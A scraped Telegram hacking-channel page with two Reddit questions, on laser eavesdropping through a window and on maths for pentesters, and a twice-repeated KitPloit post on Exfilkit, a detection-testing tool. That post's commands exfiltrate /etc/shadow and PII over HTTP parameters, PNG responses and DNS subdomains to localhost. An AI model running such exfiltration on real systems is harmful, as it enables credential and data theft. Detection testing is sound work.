Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Hacked Via Laser on window and how to block?

I have a unique situation where I need advice on this particular form of hacking and have been advised that this particular community/reddit was the best place to seek it. I have heard of white noise generators but the room being hacked via a window is my living room and if possible, would like to still use this room without the audible white noise.

Words can't express how desperately this advice is needed. Thanks.

submitted by /u/trappop
[link] [comments]
hacking: security in practice
Maths and hacking

Hi guys,

A question for those who work in a professional capacity in this field: how much maths is required, if any, for your role as a pen tester, for example? just wondering this as some say its not necessary but some say it is if you want to be an expert then it is required, especially for cryptography. Would not being good at maths hinder ones ability to excel in the field, I guess is the main question.

Thanks

submitted by /u/BackgroundAd7155
[link] [comments]
Data exfiltration (https://www.kitploit.com/search/label/Exfiltration) utility for testing (https://www.kitploit.com/search/label/Testing) detection capabilities Description Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.
Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
/etc/shadow -> HTTP POST requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
PII -> PNG embedded (https://www.kitploit.com/search/label/Embedded) in HTTP Response Server $ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log
Client # ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r
PII -> DNS subdomains (https://www.kitploit.com/search/label/Subdomains) querying Server # ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r


Download Exfilkit (https://github.com/tasooshi/exfilkit)
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Exfilkit - Data Exfiltration Utility For Testing Detection Capabilities

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhey_yUne0yxdumzLIYfqO152QDmec5MjrITKpPGRaRlEwlXlSg7O4wF83vBm3nNnQyPJDGovKd3E_hVGL4HxTip6tx0qcGtsF21gwXYUFwBg7le8lc5RAnSXR183zuHk8voyjYJ-gV4Mij1fD5MXstjNzszmfnYSAOk8dlph-3IgYGKhMvXhU2jsIQ/w640-h368/Exfilkit.png
Data exfiltration utility for testing detection capabilities

Description

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.
Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server

# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log


Client

$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r


/etc/shadow -> HTTP POST requests

Server

# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log


Client

$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r


PII -> PNG embedded in HTTP Response

Server

$ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log


Client

# ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r


PII -> DNS subdomains querying

Server

# ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log


Client

$ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r

Download Exfilkit